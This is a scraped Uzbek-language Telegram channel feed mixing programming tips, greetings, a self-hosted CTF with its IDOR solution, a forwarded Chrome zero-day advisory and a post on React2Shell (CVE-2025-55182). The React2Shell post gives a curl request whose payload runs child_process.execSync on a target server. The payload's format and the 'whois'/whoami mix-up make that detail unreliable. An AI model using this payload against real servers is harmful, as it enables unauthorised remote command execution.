π—’π˜‡π—Όπ—±π—―π—²π—Έπ——π—²π˜ƒ
371 subscribers
136 photos
65 videos
76 files
117 links
Dasturlash | Kiberxavfsizlik | Shaxsiy blog
.............................................................................
Build Break Secure

@ozodbekdevv | @dasturchichoyxonasi
Download Telegram
πŸ‘¨β€πŸ’» Python yordamida istalgan rasmdan fonni bir necha soniya ichida olib tashlash!

πŸ“¦ OΚ»rnatish:
pip install rembg


Misol:

from rembg import remove

with open("input.jpg", "rb") as i:
input_data = i.read()
output_data = remove(input_data)
with open("output.png", "wb") as o:
o.write(output_data)

@uzcodingblog
Please open Telegram to view this post
VIEW IN TELEGRAM
Ramazon muborak πŸŒ™
Please open Telegram to view this post
VIEW IN TELEGRAM
25❀3
π—’π˜‡π—Όπ—±π—―π—²π—Έπ——π—²π˜ƒ
Gemini – Ozodbek
Gemini yangi modeli orqali generatsiya qilindi, ovoz tiniqligi va nutq yomon emas. Avvalgi modellardan ancha sifatli
This media is not supported in your browser
VIEW IN TELEGRAM
1πŸ”₯3❀1
Wine β€” Linuxda .exe dasturlarni ishga tushirish imkonini beruvchi kutubxona. U Windows tizimini toβ€˜liq oβ€˜rnatmasdan turib koβ€˜plab dastur va oβ€˜yinlarni ochishga yordam beradi

Afzalliklari:
β€’ Yengil va tez ishlaydi
β€’ Virtual mashina talab qilmaydi
β€’ Koβ€˜plab dasturlar bilan mos
Oβ€˜rnatish:
sudo apt update
sudo apt install wine

Ishga tushirish:
wine dastur.exe

@uzcodingblog
πŸ”₯4
#metroda
Buildroot – bu oβ€˜rnatiladigan qurilmalar (embedded systems) uchun minimal Linux tizimini yigβ€˜ishga moβ€˜ljallangan build tizim. Odatda monitorlar, routerlar, sanoat panellari va transport displeylarida ishlatiladi, ya’ni bu oddiy kompyuter emas β€” maxsus qurilma ichida ishlaydigan kichik Linux tizimi

@uzcodingblog
space.html
13 KB
ozodbekdev.uz/space website kodi

❗️Tashqi browserda oching, telegram da emas

@uzcodingblog
Please open Telegram to view this post
VIEW IN TELEGRAM
5❀3
πŸ” Nishon: ozodbekdev.uz/ctf

Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradi siz esa TASHKILOT BOSHLIG'I malumotlariga kirishingiz kerak

🧭Zaiflik darajasi: oddiy

😈 Tizimni muvaffaqiyatli buzib kirganlar izohlarda skrinshot qoldirsin

#CyberLab
Please open Telegram to view this post
VIEW IN TELEGRAM
π—’π˜‡π—Όπ—±π—―π—²π—Έπ——π—²π˜ƒ
πŸ” Nishon: ozodbekdev.uz/ctf Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradi…
https://t.me/uzcodingblog/556?comment=5752
ZAIFLIK TOPILDI

Qanday ishladi?
Ro'yxatdan o'tganingizda URL manzilda ?id=101 kabi o'zingizning raqamingiz chiqdi. Siz raqamni shunchaki 1 ga o'zgartirdingiz va to'g'ridan-to'g'ri Admin profiliga kirib bordingiz.

Xato qayerda?
Sayt ma'lumot chiqarishdan oldin foydalanuvchini umuman tekshirmagan. Ya'ni, "Bu ma'lumotni so'rayotgan odam rostdan ham shu profil egasimi?" degan mantiqiy tekshiruv kodda yo'q edi. Server shunchaki ko'r-ko'rona ishonib, adminning sirini hammaga ochib berdi.
πŸ’ 8 mart - Xalqaro xotin-qizlar kuni

Yurtimizning muhtaram va aziz ayollari!


Sizlarni 8 mart β€” Xalqaro xotin-qizlar bayrami bilan tabriklayman
Mamlakatimiz taraqqiyoti, jamiyat ravnaqi va kelajak avlodni tarbiyalashda xotin-qizlarning oβ€˜rni beqiyosdir. Sizlar oβ€˜zingizning fidokorona mehnatingiz, yuksak mas’uliyatingiz va mehr-oqibatingiz bilan har bir sohada munosib hissa qoβ€˜shib kelmoqdasiz.
Shu fayzli bahor ayyomida sizlarga mustahkam sogβ€˜liq, oilaviy baxt-saodat, xonadonlaringizga tinchlik-xotirjamlik, mas’uliyatli faoliyatingizda ulkan yutuqlar tilayman!

@ozodbekdevv
Please open Telegram to view this post
VIEW IN TELEGRAM
❀‍πŸ”₯4❀2πŸ’˜1
Forwarded from UzCERT Live
⚠️ Google Chrome’da aniqlangan yangi β€œZero-Day” zaifliklar: foydalanuvchilarga zudlik bilan yangilanish oβ€˜rnatish tavsiya etiladi

πŸ“± Google kompaniyasi oβ€˜zining mashhur brauzeri β€” Google Chrome uchun favqulodda xavfsizlik yangilanishini e’lon qildi. Sababi β€” brauzerda aniqlangan ikki muhim zero-day zaiflik allaqachon real kiberhujumlarda faol qoβ€˜llanilayotgani tasdiqlangan.

πŸ’» Mutaxassislarning ma’lumotiga koβ€˜ra, ushbu zaifliklar yordamida hujumchilar foydalanuvchi tizimida zararli kodni ishga tushirishi, brauzer xavfsizlik mexanizmlarini chetlab oβ€˜tishi hamda qurilma ustidan nazoratni qoβ€˜lga kiritishi mumkin.

βœ… Mazkur tahdidni bartaraf etish maqsadida Chrome brauzerining 146.0.7680.75/76 versiyasi Windows va macOS tizimlari uchun, 146.0.7680.75 versiyasi esa Linux uchun chiqarildi. Yangilanish bosqichma-bosqich tarzda butun dunyo foydalanuvchilariga yetkazilmoqda.

πŸ“± Batafsil

#Google #Chrome #Windows #macOS #Linux #zaiflik
πŸš€ UZCERT xizmatining rasmiy telegram sahifasiga a’zo boβ€˜ling!
Please open Telegram to view this post
VIEW IN TELEGRAM
React2Shell (CVE-2025-55182)

Yaqinda React va Next.js ekotizimida juda xavfli zaiflik aniqlangan. Bu zaiflik React Server Components (RSC) ishlatiladigan serverlarda masofadan turib buyruq bajarishga (Remote Code Execution) imkon beradi.
Muammo RSC β€œFlight protocol” maΚΌlumotlarini notoΚ»gΚ»ri qayta ishlash bilan bogΚ»liq. Maxsus tayyorlangan payload orqali hujumchi server tomonda Node.js modullarini chaqirishi va OS buyruqlarini bajarishi mumkin. Shuningdek 15million aholi malumotlari aynan shu zaiflik asosida olingan

- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- TaΚΌsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 – 10.0 (Critical)

@uzcodingblog
5❀1
Foydalanish:
Ushbu zaiflikdan faqat React oΚ»rnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :
npm install -g wappalyzer
wappalyzer https://example.com

Foydalanilgan texnologiyalar orasida React mavjud boΚ»lsa bu serverda React2Shell zaifligi boΚ»lishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:
curl -s -X POST http://example.com:4000/api/rsc/render \
-H "Content-Type: application/json" \
-d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'

Bu orqali server terminalida whois buyrugΚ»ini berdik va javob ubuntu tarzida chiqadi

@uzcodingblog
This media is not supported in your browser
VIEW IN TELEGRAM
❀4